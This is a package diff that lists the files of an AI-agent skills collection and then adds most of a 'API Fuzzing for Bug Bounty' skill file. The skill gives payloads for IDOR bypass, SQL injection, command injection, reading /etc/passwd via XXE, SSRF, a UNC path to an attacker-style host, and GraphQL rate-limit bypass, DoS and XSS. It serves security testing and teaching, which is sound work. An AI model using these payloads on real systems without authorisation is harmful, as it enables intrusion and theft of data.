package/skills/javascript-testing-patterns/SKILL.md +35 -0
package/skills/javascript-testing-patterns/resources/implementation-playbook.md +1024 -0
package/skills/javascript-typescript-typescript-scaffold/SKILL.md +361 -0
package/skills/jira-automation/SKILL.md +185 -0
package/skills/julia-pro/SKILL.md +209 -0
package/skills/k8s-manifest-generator/SKILL.md +35 -0
package/skills/k8s-manifest-generator/resources/implementation-playbook.md +510 -0
package/skills/k8s-security-policies/SKILL.md +346 -0
package/skills/kaizen/SKILL.md +730 -0
package/skills/klaviyo-automation/SKILL.md +190 -0
package/skills/kpi-dashboard-design/SKILL.md +440 -0
package/skills/kubernetes-architect/SKILL.md +170 -0
package/skills/langchain-architecture/SKILL.md +350 -0
package/skills/langfuse/SKILL.md +238 -0
package/skills/langgraph/SKILL.md +287 -0
package/skills/last30days/SKILL.md +421 -0
package/skills/launch-strategy/SKILL.md +344 -0
package/skills/legacy-modernizer/SKILL.md +53 -0
package/skills/legal-advisor/SKILL.md +70 -0
package/skills/linear-automation/SKILL.md +178 -0
package/skills/linear-claude-skill/SKILL.md +543 -0
package/skills/linkedin-automation/SKILL.md +175 -0
package/skills/linkerd-patterns/SKILL.md +321 -0
package/skills/lint-and-validate/SKILL.md +45 -0
package/skills/linux-privilege-escalation/SKILL.md +504 -0
package/skills/linux-shell-scripting/SKILL.md +504 -0
package/skills/llm-app-patterns/SKILL.md +760 -0
package/skills/llm-application-dev-ai-assistant/SKILL.md +35 -0
package/skills/llm-application-dev-ai-assistant/resources/implementation-playbook.md +1236 -0
package/skills/llm-application-dev-langchain-agent/SKILL.md +246 -0
package/skills/llm-application-dev-prompt-optimize/SKILL.md +37 -0
package/skills/llm-application-dev-prompt-optimize/resources/implementation-playbook.md +591 -0
package/skills/llm-evaluation/SKILL.md +483 -0
package/skills/loki-mode/SKILL.md +721 -0
package/skills/machine-learning-ops-ml-pipeline/SKILL.md +314 -0
package/skills/mailchimp-automation/SKILL.md +231 -0
package/skills/make-automation/SKILL.md +201 -0
package/skills/makepad-skills/SKILL.md +22 -0
package/skills/malware-analyst/SKILL.md +247 -0
package/skills/market-sizing-analysis/SKILL.md +425 -0
package/skills/marketing-ideas/SKILL.md +221 -0
package/skills/marketing-psychology/SKILL.md +255 -0
package/skills/mcp-builder/LICENSE.txt +202 -0
package/skills/mcp-builder/SKILL.md +236 -0
package/skills/mcp-builder/resources/evaluation.md +602 -0
package/skills/mcp-builder/resources/mcp_best_practices.md +249 -0
package/skills/mcp-builder/resources/node_mcp_server.md +970 -0
package/skills/mcp-builder/resources/python_mcp_server.md +719 -0
package/skills/mcp-builder/scripts/connections.py +151 -0
package/skills/mcp-builder/scripts/evaluation.py +373 -0
package/skills/mcp-builder/scripts/example_evaluation.xml +22 -0
package/skills/mcp-builder/scripts/requirements.txt +2 -0
package/skills/memory-forensics/SKILL.md +491 -0
package/skills/memory-safety-patterns/SKILL.md +33 -0
package/skills/memory-safety-patterns/resources/implementation-playbook.md +603 -0
package/skills/memory-systems/SKILL.md +228 -0
package/skills/mermaid-expert/SKILL.md +59 -0
package/skills/metasploit-framework/SKILL.md +478 -0
package/skills/micro-saas-launcher/SKILL.md +212 -0
package/skills/microservices-patterns/SKILL.md +35 -0
package/skills/microservices-patterns/resources/implementation-playbook.md +607 -0
package/skills/microsoft-teams-automation/SKILL.md +211 -0
package/skills/minecraft-bukkit-pro/SKILL.md +126 -0
package/skills/miro-automation/SKILL.md +205 -0
package/skills/mixpanel-automation/SKILL.md +224 -0
package/skills/ml-engineer/SKILL.md +168 -0
package/skills/ml-pipeline-workflow/SKILL.md +257 -0
package/skills/mlops-engineer/SKILL.md +219 -0
package/skills/mobile-design/SKILL.md +284 -0
package/skills/mobile-developer/SKILL.md +205 -0
package/skills/mobile-security-coder/SKILL.md +184 -0
package/skills/modern-javascript-patterns/SKILL.md +35 -0
package/skills/modern-javascript-patterns/resources/implementation-playbook.md +910 -0
package/skills/monday-automation/SKILL.md +233 -0
package/skills/monorepo-architect/SKILL.md +61 -0
package/skills/monorepo-management/SKILL.md +35 -0
package/skills/monorepo-management/resources/implementation-playbook.md +621 -0
package/skills/moodle-external-api-development/SKILL.md +597 -0
package/skills/mtls-configuration/SKILL.md +359 -0
package/skills/multi-agent-brainstorming/SKILL.md +256 -0
package/skills/multi-agent-patterns/SKILL.md +262 -0
package/skills/multi-cloud-architecture/SKILL.md +189 -0
package/skills/multi-platform-apps-multi-platform/SKILL.md +203 -0
package/skills/n8n-code-python/SKILL.md +750 -0
package/skills/n8n-mcp-tools-expert/SKILL.md +654 -0
package/skills/n8n-node-configuration/SKILL.md +796 -0
package/skills/nanobanana-ppt-skills/SKILL.md +22 -0
package/skills/neon-postgres/SKILL.md +56 -0
package/skills/nestjs-expert/SKILL.md +552 -0
package/skills/network-101/SKILL.md +342 -0
package/skills/network-engineer/SKILL.md +169 -0
package/skills/nextjs-app-router-patterns/SKILL.md +33 -0
package/skills/nextjs-app-router-patterns/resources/implementation-playbook.md +543 -0
package/skills/nextjs-best-practices/SKILL.md +203 -0
package/skills/nextjs-supabase-auth/SKILL.md +56 -0
package/skills/nft-standards/SKILL.md +395 -0
package/skills/nodejs-backend-patterns/SKILL.md +35 -0
package/skills/nodejs-backend-patterns/resources/implementation-playbook.md +1019 -0
package/skills/nodejs-best-practices/SKILL.md +333 -0
package/skills/nosql-expert/SKILL.md +111 -0
package/skills/notebooklm/SKILL.md +269 -0
package/skills/notion-automation/SKILL.md +215 -0
package/skills/notion-template-business/SKILL.md +216 -0
package/skills/nx-workspace-patterns/SKILL.md +464 -0
package/skills/observability-engineer/SKILL.md +237 -0
package/skills/observability-monitoring-monitor-setup/SKILL.md +48 -0
package/skills/observability-monitoring-monitor-setup/resources/implementation-playbook.md +505 -0
package/skills/observability-monitoring-slo-implement/SKILL.md +43 -0
package/skills/observability-monitoring-slo-implement/resources/implementation-playbook.md +1077 -0
package/skills/observe-whatsapp/SKILL.md +109 -0
package/skills/obsidian-clipper-template-creator/SKILL.md +64 -0
package/skills/on-call-handoff-patterns/SKILL.md +453 -0
package/skills/onboarding-cro/SKILL.md +433 -0
package/skills/one-drive-automation/SKILL.md +238 -0
package/skills/openapi-spec-generation/SKILL.md +33 -0
package/skills/openapi-spec-generation/resources/implementation-playbook.md +1027 -0
package/skills/oss-hunter/SKILL.md +75 -0
package/skills/outlook-automation/SKILL.md +191 -0
package/skills/outlook-calendar-automation/SKILL.md +236 -0
package/skills/page-cro/SKILL.md +343 -0
package/skills/pagerduty-automation/SKILL.md +245 -0
package/skills/paid-ads/SKILL.md +551 -0
package/skills/parallel-agents/SKILL.md +175 -0
package/skills/payment-integration/SKILL.md +77 -0
package/skills/paypal-integration/SKILL.md +479 -0
package/skills/paywall-upgrade-cro/SKILL.md +570 -0
package/skills/pci-compliance/SKILL.md +478 -0
package/skills/pentest-checklist/SKILL.md +334 -0
package/skills/pentest-commands/SKILL.md +438 -0
package/skills/performance-engineer/SKILL.md +180 -0
package/skills/performance-profiling/SKILL.md +143 -0
package/skills/performance-testing-review-ai-review/SKILL.md +450 -0
package/skills/performance-testing-review-multi-agent-review/SKILL.md +216 -0
package/skills/personal-tool-builder/SKILL.md +289 -0
package/skills/php-pro/SKILL.md +63 -0
package/skills/pipedrive-automation/SKILL.md +224 -0
package/skills/plaid-fintech/SKILL.md +50 -0
package/skills/plan-writing/SKILL.md +152 -0
package/skills/planning-with-files/SKILL.md +211 -0
package/skills/playwright-skill/SKILL.md +453 -0
package/skills/popup-cro/SKILL.md +346 -0
package/skills/posix-shell-pro/SKILL.md +304 -0
package/skills/postgres-best-practices/SKILL.md +57 -0
package/skills/postgresql/SKILL.md +230 -0
package/skills/posthog-automation/SKILL.md +224 -0
package/skills/postmark-automation/SKILL.md +187 -0
package/skills/postmortem-writing/SKILL.md +386 -0
package/skills/powershell-windows/SKILL.md +167 -0
package/skills/pricing-strategy/SKILL.md +356 -0
package/skills/prisma-expert/SKILL.md +355 -0
package/skills/privilege-escalation-methods/SKILL.md +333 -0
package/skills/product-manager-toolkit/SKILL.md +351 -0
package/skills/production-code-audit/SKILL.md +540 -0
package/skills/programmatic-seo/SKILL.md +351 -0
package/skills/projection-patterns/SKILL.md +33 -0
package/skills/projection-patterns/resources/implementation-playbook.md +501 -0
package/skills/prometheus-configuration/SKILL.md +404 -0
package/skills/prompt-caching/SKILL.md +61 -0
package/skills/prompt-engineer/SKILL.md +252 -0
package/skills/prompt-engineering/SKILL.md +171 -0
package/skills/prompt-engineering-patterns/SKILL.md +213 -0
package/skills/prompt-library/SKILL.md +322 -0
package/skills/protocol-reverse-engineering/SKILL.md +29 -0
package/skills/protocol-reverse-engineering/resources/implementation-playbook.md +509 -0
package/skills/pypict-skill/SKILL.md +22 -0
package/skills/python-development-python-scaffold/SKILL.md +331 -0
package/skills/python-packaging/SKILL.md +36 -0
package/skills/python-packaging/resources/implementation-playbook.md +869 -0
package/skills/python-patterns/SKILL.md +441 -0
package/skills/python-performance-optimization/SKILL.md +36 -0
package/skills/python-performance-optimization/resources/implementation-playbook.md +868 -0
package/skills/python-pro/SKILL.md +158 -0
package/skills/python-testing-patterns/SKILL.md +37 -0
package/skills/python-testing-patterns/resources/implementation-playbook.md +906 -0
package/skills/quant-analyst/SKILL.md +53 -0
package/skills/radix-ui-design-system/SKILL.md +847 -0
package/skills/rag-engineer/SKILL.md +90 -0
package/skills/rag-implementation/SKILL.md +421 -0
package/skills/react-best-practices/SKILL.md +121 -0
package/skills/react-modernization/SKILL.md +34 -0
package/skills/react-modernization/resources/implementation-playbook.md +512 -0
package/skills/react-native-architecture/SKILL.md +33 -0
package/skills/react-native-architecture/resources/implementation-playbook.md +670 -0
package/skills/react-patterns/SKILL.md +198 -0
package/skills/react-state-management/SKILL.md +441 -0
package/skills/react-ui-patterns/SKILL.md +289 -0
package/skills/readme/SKILL.md +842 -0
package/skills/receiving-code-review/SKILL.md +213 -0
package/skills/red-team-tactics/SKILL.md +199 -0
package/skills/red-team-tools/SKILL.md +310 -0
package/skills/reddit-automation/SKILL.md +212 -0
package/skills/reference-builder/SKILL.md +188 -0
package/skills/referral-program/SKILL.md +602 -0
package/skills/remotion-best-practices/SKILL.md +45 -0
package/skills/render-automation/SKILL.md +181 -0
package/skills/requesting-code-review/SKILL.md +105 -0
package/skills/research-engineer/SKILL.md +135 -0
package/skills/reverse-engineer/SKILL.md +173 -0
package/skills/risk-manager/SKILL.md +61 -0
package/skills/risk-metrics-calculation/SKILL.md +33 -0
package/skills/risk-metrics-calculation/resources/implementation-playbook.md +554 -0
package/skills/ruby-pro/SKILL.md +56 -0
package/skills/rust-async-patterns/SKILL.md +33 -0
package/skills/rust-async-patterns/resources/implementation-playbook.md +516 -0
package/skills/rust-pro/SKILL.md +178 -0
package/skills/saga-orchestration/SKILL.md +496 -0
package/skills/sales-automator/SKILL.md +55 -0
package/skills/salesforce-automation/SKILL.md +190 -0
package/skills/salesforce-development/SKILL.md +51 -0
package/skills/sast-configuration/SKILL.md +212 -0
package/skills/scala-pro/SKILL.md +82 -0
package/skills/scanning-tools/SKILL.md +589 -0
package/skills/schema-markup/SKILL.md +360 -0
package/skills/screen-reader-testing/SKILL.md +33 -0
package/skills/screen-reader-testing/resources/implementation-playbook.md +544 -0
package/skills/screenshots/SKILL.md +401 -0
package/skills/scroll-experience/SKILL.md +263 -0
package/skills/search-specialist/SKILL.md +80 -0
package/skills/secrets-management/SKILL.md +364 -0
package/skills/security-auditor/SKILL.md +169 -0
package/skills/security-bluebook-builder/SKILL.md +22 -0
package/skills/security-compliance-compliance-check/SKILL.md +55 -0
package/skills/security-compliance-compliance-check/resources/implementation-playbook.md +963 -0
package/skills/security-requirement-extraction/SKILL.md +33 -0
package/skills/security-requirement-extraction/resources/implementation-playbook.md +676 -0
package/skills/security-scanning-security-dependencies/SKILL.md +43 -0
package/skills/security-scanning-security-dependencies/resources/implementation-playbook.md +544 -0
package/skills/security-scanning-security-hardening/SKILL.md +147 -0
package/skills/security-scanning-security-sast/SKILL.md +495 -0
package/skills/segment-automation/SKILL.md +225 -0
package/skills/segment-cdp/SKILL.md +50 -0
package/skills/sendgrid-automation/SKILL.md +228 -0
package/skills/senior-architect/SKILL.md +209 -0
package/skills/senior-fullstack/SKILL.md +209 -0
package/skills/sentry-automation/SKILL.md +232 -0
package/skills/seo-audit/SKILL.md +487 -0
package/skills/seo-authority-builder/SKILL.md +136 -0
package/skills/seo-cannibalization-detector/SKILL.md +123 -0
package/skills/seo-content-auditor/SKILL.md +83 -0
package/skills/seo-content-planner/SKILL.md +108 -0
package/skills/seo-content-refresher/SKILL.md +118 -0
package/skills/seo-content-writer/SKILL.md +96 -0
package/skills/seo-fundamentals/SKILL.md +173 -0
package/skills/seo-keyword-strategist/SKILL.md +95 -0
package/skills/seo-meta-optimizer/SKILL.md +92 -0
package/skills/seo-snippet-hunter/SKILL.md +114 -0
package/skills/seo-structure-architect/SKILL.md +108 -0
package/skills/server-management/SKILL.md +161 -0
package/skills/service-mesh-expert/SKILL.md +58 -0
package/skills/service-mesh-observability/SKILL.md +395 -0
package/skills/sharp-edges/SKILL.md +70 -0
package/skills/shellcheck-configuration/SKILL.md +466 -0
package/skills/shodan-reconnaissance/SKILL.md +503 -0
package/skills/shopify-apps/SKILL.md +42 -0
package/skills/shopify-automation/SKILL.md +168 -0
package/skills/shopify-development/SKILL.md +366 -0
package/skills/signup-flow-cro/SKILL.md +355 -0
package/skills/similarity-search-patterns/SKILL.md +33 -0
package/skills/similarity-search-patterns/resources/implementation-playbook.md +557 -0
package/skills/skill-creator/LICENSE.txt +202 -0
package/skills/skill-creator/SKILL.md +357 -0
package/skills/skill-creator/resources/output-patterns.md +82 -0
package/skills/skill-creator/resources/workflows.md +28 -0
package/skills/skill-creator/scripts/init_skill.py +303 -0
package/skills/skill-creator/scripts/package_skill.py +110 -0
package/skills/skill-creator/scripts/quick_validate.py +103 -0
package/skills/skill-developer/SKILL.md +426 -0
package/skills/skill-rails-upgrade/SKILL.md +408 -0
package/skills/skill-seekers/SKILL.md +22 -0
package/skills/slack-automation/SKILL.md +189 -0
package/skills/slack-bot-builder/SKILL.md +264 -0
package/skills/slack-gif-creator/LICENSE.txt +202 -0
package/skills/slack-gif-creator/SKILL.md +254 -0
package/skills/slack-gif-creator/core/easing.py +234 -0
package/skills/slack-gif-creator/core/frame_composer.py +176 -0
package/skills/slack-gif-creator/core/gif_builder.py +269 -0
package/skills/slack-gif-creator/core/validators.py +136 -0
package/skills/slack-gif-creator/requirements.txt +4 -0
package/skills/slo-implementation/SKILL.md +341 -0
package/skills/smtp-penetration-testing/SKILL.md +500 -0
package/skills/social-content/SKILL.md +807 -0
package/skills/software-architecture/SKILL.md +75 -0
package/skills/solidity-security/SKILL.md +34 -0
package/skills/solidity-security/resources/implementation-playbook.md +524 -0
package/skills/spark-optimization/SKILL.md +427 -0
package/skills/sql-injection-testing/SKILL.md +448 -0
package/skills/sql-optimization-patterns/SKILL.md +35 -0
package/skills/sql-optimization-patterns/resources/implementation-playbook.md +504 -0
package/skills/sql-pro/SKILL.md +173 -0
package/skills/sqlmap-database-pentesting/SKILL.md +400 -0
package/skills/square-automation/SKILL.md +176 -0
package/skills/ssh-penetration-testing/SKILL.md +488 -0
package/skills/startup-analyst/SKILL.md +328 -0
package/skills/startup-business-analyst-business-case/SKILL.md +487 -0
package/skills/startup-business-analyst-financial-projections/SKILL.md +353 -0
package/skills/startup-business-analyst-market-opportunity/SKILL.md +240 -0
package/skills/startup-financial-modeling/SKILL.md +467 -0
package/skills/startup-metrics-framework/SKILL.md +34 -0
package/skills/startup-metrics-framework/resources/implementation-playbook.md +500 -0
package/skills/stitch-ui-design/SKILL.md +378 -0
package/skills/stride-analysis-patterns/SKILL.md +33 -0
package/skills/stride-analysis-patterns/resources/implementation-playbook.md +655 -0
package/skills/stripe-automation/SKILL.md +198 -0
package/skills/stripe-integration/SKILL.md +454 -0
package/skills/subagent-driven-development/SKILL.md +240 -0
package/skills/supabase-automation/SKILL.md +236 -0
package/skills/superpowers-lab/SKILL.md +22 -0
package/skills/swiftui-expert-skill/SKILL.md +275 -0
package/skills/systematic-debugging/SKILL.md +296 -0
package/skills/systems-programming-rust-project/SKILL.md +440 -0
package/skills/tailwind-design-system/SKILL.md +33 -0
package/skills/tailwind-design-system/resources/implementation-playbook.md +665 -0
package/skills/tailwind-patterns/SKILL.md +269 -0
package/skills/tavily-web/SKILL.md +36 -0
package/skills/tdd-orchestrator/SKILL.md +205 -0
package/skills/tdd-workflow/SKILL.md +149 -0
package/skills/tdd-workflows-tdd-cycle/SKILL.md +221 -0
package/skills/tdd-workflows-tdd-green/SKILL.md +73 -0
package/skills/tdd-workflows-tdd-green/resources/implementation-playbook.md +870 -0
package/skills/tdd-workflows-tdd-red/SKILL.md +164 -0
package/skills/tdd-workflows-tdd-refactor/SKILL.md +187 -0
package/skills/team-collaboration-issue/SKILL.md +37 -0
package/skills/team-collaboration-issue/resources/implementation-playbook.md +640 -0
package/skills/team-collaboration-standup-notes/SKILL.md +44 -0
package/skills/team-collaboration-standup-notes/resources/implementation-playbook.md +768 -0
package/skills/team-composition-analysis/SKILL.md +413 -0
package/skills/telegram-automation/SKILL.md +219 -0
package/skills/telegram-bot-builder/SKILL.md +254 -0
package/skills/telegram-mini-app/SKILL.md +279 -0
package/skills/temporal-python-pro/SKILL.md +370 -0
package/skills/temporal-python-testing/SKILL.md +170 -0
package/skills/temporal-python-testing/resources/integration-testing.md +455 -0
package/skills/temporal-python-testing/resources/local-setup.md +553 -0
package/skills/temporal-python-testing/resources/replay-testing.md +462 -0
package/skills/temporal-python-testing/resources/unit-testing.md +328 -0
package/skills/terraform-module-library/SKILL.md +261 -0
package/skills/terraform-skill/SKILL.md +517 -0
package/skills/terraform-specialist/SKILL.md +166 -0
package/skills/test-automator/SKILL.md +224 -0
package/skills/test-driven-development/SKILL.md +371 -0
package/skills/test-fixing/SKILL.md +119 -0
package/skills/testing-patterns/SKILL.md +259 -0
package/skills/theme-factory/LICENSE.txt +202 -0
package/skills/theme-factory/SKILL.md +59 -0
package/skills/theme-factory/theme-showcase.pdf +0 -0
package/skills/theme-factory/themes/arctic-frost.md +19 -0
package/skills/theme-factory/themes/botanical-garden.md +19 -0
package/skills/theme-factory/themes/desert-rose.md +19 -0
package/skills/theme-factory/themes/forest-canopy.md +19 -0
package/skills/theme-factory/themes/golden-hour.md +19 -0
package/skills/theme-factory/themes/midnight-galaxy.md +19 -0
package/skills/theme-factory/themes/modern-minimalist.md +19 -0
package/skills/theme-factory/themes/ocean-depths.md +19 -0
package/skills/theme-factory/themes/sunset-boulevard.md +19 -0
package/skills/theme-factory/themes/tech-innovation.md +19 -0
package/skills/threat-mitigation-mapping/SKILL.md +33 -0
package/skills/threat-mitigation-mapping/resources/implementation-playbook.md +744 -0
package/skills/threat-modeling-expert/SKILL.md +60 -0
package/skills/threejs-skills/SKILL.md +22 -0
package/skills/tiktok-automation/SKILL.md +178 -0
package/skills/todoist-automation/SKILL.md +231 -0
package/skills/tool-design/SKILL.md +318 -0
package/skills/top-web-vulnerabilities/SKILL.md +543 -0
package/skills/track-management/SKILL.md +38 -0
package/skills/track-management/resources/implementation-playbook.md +591 -0
package/skills/trello-automation/SKILL.md +181 -0
package/skills/trigger-dev/SKILL.md +67 -0
package/skills/turborepo-caching/SKILL.md +419 -0
package/skills/tutorial-engineer/SKILL.md +139 -0
package/skills/twilio-communications/SKILL.md +295 -0
package/skills/twitter-automation/SKILL.md +231 -0
package/skills/typescript-advanced-types/SKILL.md +35 -0
package/skills/typescript-advanced-types/resources/implementation-playbook.md +716 -0
package/skills/typescript-expert/SKILL.md +429 -0
package/skills/typescript-pro/SKILL.md +55 -0
package/skills/ui-skills/SKILL.md +22 -0
package/skills/ui-ux-designer/SKILL.md +209 -0
package/skills/ui-ux-pro-max/SKILL.md +351 -0
package/skills/ui-visual-validator/SKILL.md +214 -0
package/skills/unit-testing-test-generate/SKILL.md +319 -0
package/skills/unity-developer/SKILL.md +230 -0
package/skills/unity-ecs-patterns/SKILL.md +33 -0
package/skills/unity-ecs-patterns/resources/implementation-playbook.md +625 -0
package/skills/unreal-engine-cpp-pro/SKILL.md +114 -0
package/skills/upgrading-expo/SKILL.md +118 -0
package/skills/upstash-qstash/SKILL.md +68 -0
package/skills/using-git-worktrees/SKILL.md +217 -0
package/skills/using-neon/SKILL.md +84 -0
package/skills/using-superpowers/SKILL.md +87 -0
package/skills/uv-package-manager/SKILL.md +37 -0
package/skills/uv-package-manager/resources/implementation-playbook.md +830 -0
package/skills/varlock-claude-skill/SKILL.md +22 -0
package/skills/vector-database-engineer/SKILL.md +60 -0
package/skills/vector-index-tuning/SKILL.md +42 -0
package/skills/vector-index-tuning/resources/implementation-playbook.md +507 -0
package/skills/vercel-automation/SKILL.md +226 -0
package/skills/vercel-deploy-claimable/SKILL.md +123 -0
package/skills/vercel-deployment/SKILL.md +79 -0
package/skills/verification-before-completion/SKILL.md +139 -0
package/skills/vexor/SKILL.md +22 -0
package/skills/viral-generator-builder/SKILL.md +199 -0
package/skills/voice-agents/SKILL.md +68 -0
package/skills/voice-ai-development/SKILL.md +302 -0
package/skills/voice-ai-engine-development/SKILL.md +721 -0
package/skills/vulnerability-scanner/SKILL.md +276 -0
package/skills/wcag-audit-patterns/SKILL.md +41 -0
package/skills/wcag-audit-patterns/resources/implementation-playbook.md +541 -0
package/skills/web-artifacts-builder/LICENSE.txt +202 -0
package/skills/web-artifacts-builder/SKILL.md +74 -0
package/skills/web-artifacts-builder/scripts/bundle-artifact.sh +54 -0
package/skills/web-artifacts-builder/scripts/init-artifact.sh +322 -0
package/skills/web-artifacts-builder/scripts/shadcn-components.tar.gz +0 -0
package/skills/web-design-guidelines/SKILL.md +36 -0
package/skills/web-performance-optimization/SKILL.md +646 -0
package/skills/web3-testing/SKILL.md +427 -0
package/skills/webapp-testing/LICENSE.txt +202 -0
package/skills/webapp-testing/SKILL.md +96 -0
package/skills/webapp-testing/examples/console_logging.py +35 -0
package/skills/webapp-testing/examples/element_discovery.py +40 -0
package/skills/webapp-testing/examples/static_html_automation.py +33 -0
package/skills/webapp-testing/scripts/with_server.py +106 -0
package/skills/webflow-automation/SKILL.md +236 -0
package/skills/whatsapp-automation/SKILL.md +214 -0
package/skills/windows-privilege-escalation/SKILL.md +496 -0
package/skills/wireshark-analysis/SKILL.md +497 -0
package/skills/wordpress-penetration-testing/SKILL.md +485 -0
package/skills/workflow-automation/SKILL.md +68 -0
package/skills/workflow-orchestration-patterns/SKILL.md +333 -0
package/skills/workflow-patterns/SKILL.md +38 -0
package/skills/workflow-patterns/resources/implementation-playbook.md +621 -0
package/skills/wrike-automation/SKILL.md +233 -0
package/skills/writing-plans/SKILL.md +116 -0
package/skills/writing-skills/SKILL.md +125 -0
package/skills/x-article-publisher-skill/SKILL.md +22 -0
package/skills/xss-html-injection/SKILL.md +499 -0
package/skills/youtube-automation/SKILL.md +218 -0
package/skills/youtube-summarizer/SKILL.md +411 -0
package/skills/zapier-make-patterns/SKILL.md +67 -0
package/skills/zendesk-automation/SKILL.md +215 -0
package/skills/zoho-crm-automation/SKILL.md +206 -0
package/skills/zoom-automation/SKILL.md +217 -0
package/src/dedup.ts +132 -0
package/src/index.ts +26 -0
package/src/loader.ts +33 -0
package/src/search.ts +83 -0
package/src/server.ts +83 -0
package/src/skill-index.ts +105 -0
package/src/types.ts +28 -0
package/test/dedup.test.ts +33 -0
package/test/fixtures/allowed-tools/SKILL.md +9 -0
package/test/fixtures/basic-skill/SKILL.md +11 -0
package/test/fixtures/empty-description/SKILL.md +7 -0
package/test/fixtures/invalid-frontmatter/SKILL.md +7 -0
package/test/fixtures/multiline-description/SKILL.md +11 -0
package/test/fixtures/no-frontmatter/SKILL.md +3 -0
package/test/fixtures/skill-with-hyphenated-resources/SKILL.md +8 -0
package/test/fixtures/skill-with-hyphenated-resources/resources/implementation-playbook.md +3 -0
package/test/fixtures/skill-with-hyphenated-resources/resources/quick-start-guide.md +3 -0
package/test/fixtures/skill-with-resources/SKILL.md +8 -0
package/test/fixtures/skill-with-resources/resources/examples.md +3 -0
package/test/fixtures/skill-with-resources/resources/guide.md +3 -0
package/test/integration.test.ts +148 -0
package/test/loader.test.ts +78 -0
package/test/search.test.ts +135 -0
package/test/server.test.ts +94 -0
package/test/skill-index.test.ts +144 -0
package/tsconfig.json +15 -0
package/tsup.config.ts +12 -0
package/vitest.config.ts +5 -0

package/skills/api-fuzzing-bug-bounty/SKILL.md ADDED Viewed

@@ -0,0 +1,433 @@
+---
+name: API Fuzzing for Bug Bounty
+description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+# API Fuzzing for Bug Bounty
+## Purpose
+Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
+## Inputs/Prerequisites
+- Burp Suite or similar proxy tool
+- API wordlists (SecLists, api_wordlist)
+- Understanding of REST/GraphQL/SOAP protocols
+- Python for scripting
+- Target API endpoints and documentation (if available)
+## Outputs/Deliverables
+- Identified API vulnerabilities
+- IDOR exploitation proofs
+- Authentication bypass techniques
+- SQL injection points
+- Unauthorized data access documentation
+---
+## API Types Overview
+| Type | Protocol | Data Format | Structure |
+|------|----------|-------------|-----------|
+| SOAP | HTTP | XML | Header + Body |
+| REST | HTTP | JSON/XML/URL | Defined endpoints |
+| GraphQL | HTTP | Custom Query | Single endpoint |
+---
+## Core Workflow
+### Step 1: API Reconnaissance
+Identify API type and enumerate endpoints:
+```bash
+# Check for Swagger/OpenAPI documentation
+/swagger.json
+/openapi.json
+/api-docs
+/v1/api-docs
+/swagger-ui.html
+# Use Kiterunner for API discovery
+kr scan https://target.com -w routes-large.kite
+# Extract paths from Swagger
+python3 json2paths.py swagger.json
+```
+### Step 2: Authentication Testing
+```bash
+# Test different login paths
+/api/mobile/login
+/api/v3/login
+/api/magic_link
+/api/admin/login
+# Check rate limiting on auth endpoints
+# If no rate limit → brute force possible
+# Test mobile vs web API separately
+# Don't assume same security controls
+```
+### Step 3: IDOR Testing
+Insecure Direct Object Reference is the most common API vulnerability:
+```bash
+# Basic IDOR
+GET /api/users/1234 → GET /api/users/1235
+# Even if ID is email-based, try numeric
+/?user_id=111 instead of /?user_id=user@mail.com
+# Test /me/orders vs /user/654321/orders
+```
+**IDOR Bypass Techniques:**
+```bash
+# Wrap ID in array
+{"id":111} → {"id":[111]}
+# JSON wrap
+{"id":111} → {"id":{"id":111}}
+# Send ID twice
+URL?id=<LEGIT>&id=<VICTIM>
+# Wildcard injection
+{"user_id":"*"}
+# Parameter pollution
+/api/get_profile?user_id=<victim>&user_id=<legit>
+{"user_id":<legit_id>,"user_id":<victim_id>}
+```
+### Step 4: Injection Testing
+**SQL Injection in JSON:**
+```json
+{"id":"56456"}                    → OK
+{"id":"56456 AND 1=1#"}           → OK
+{"id":"56456 AND 1=2#"}           → OK
+{"id":"56456 AND 1=3#"}           → ERROR (vulnerable!)
+{"id":"56456 AND sleep(15)#"}     → SLEEP 15 SEC
+```
+**Command Injection:**
+```bash
+# Ruby on Rails
+?url=Kernel#open → ?url=|ls
+# Linux command injection
+api.url.com/endpoint?name=file.txt;ls%20/
+```
+**XXE Injection:**
+```xml
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
+```
+**SSRF via API:**
+```html
+<object data="http://127.0.0.1:8443"/>
+<img src="http://127.0.0.1:445"/>
+```
+**.NET Path.Combine Vulnerability:**
+```bash
+# If .NET app uses Path.Combine(path_1, path_2)
+# Test for path traversal
+https://example.org/download?filename=a.png
+https://example.org/download?filename=C:\inetpub\wwwroot\web.config
+https://example.org/download?filename=\\smb.dns.attacker.com\a.png
+```
+### Step 5: Method Testing
+```bash
+# Test all HTTP methods
+GET /api/v1/users/1
+POST /api/v1/users/1
+PUT /api/v1/users/1
+DELETE /api/v1/users/1
+PATCH /api/v1/users/1
+# Switch content type
+Content-Type: application/json → application/xml
+```
+---
+## GraphQL-Specific Testing
+### Introspection Query
+Fetch entire backend schema:
+```graphql
+{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
+```
+**URL-encoded version:**
+```
+/graphql?query={__schema{types{name,kind,description,fields{name}}}}
+```
+### GraphQL IDOR
+```graphql
+# Try accessing other user IDs
+query {
+  user(id: "OTHER_USER_ID") {
+    email
+    password
+    creditCard
+  }
+}
+```
+### GraphQL SQL/NoSQL Injection
+```graphql
+mutation {
+  login(input: {
+    email: "test' or 1=1--"
+    password: "password"
+  }) {
+    success
+    jwt
+  }
+}
+```
+### Rate Limit Bypass (Batching)
+```graphql
+mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
+mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
+mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
+```
+### GraphQL DoS (Nested Queries)
+```graphql
+query {
+  posts {
+    comments {
+      user {
+        posts {
+          comments {
+            user {
+              posts { ... }
+            }
+          }
+        }
+      }
+    }
+  }
+}
+```
+### GraphQL XSS
+```bash
+# XSS via GraphQL endpoint
+http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
+# URL-encoded XSS
+http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
+```
+### GraphQL Tools
+| Tool | Purpose |
+|------|---------|
+| GraphCrawler | Schema discovery |
+| graphw00f | Fingerprinting |
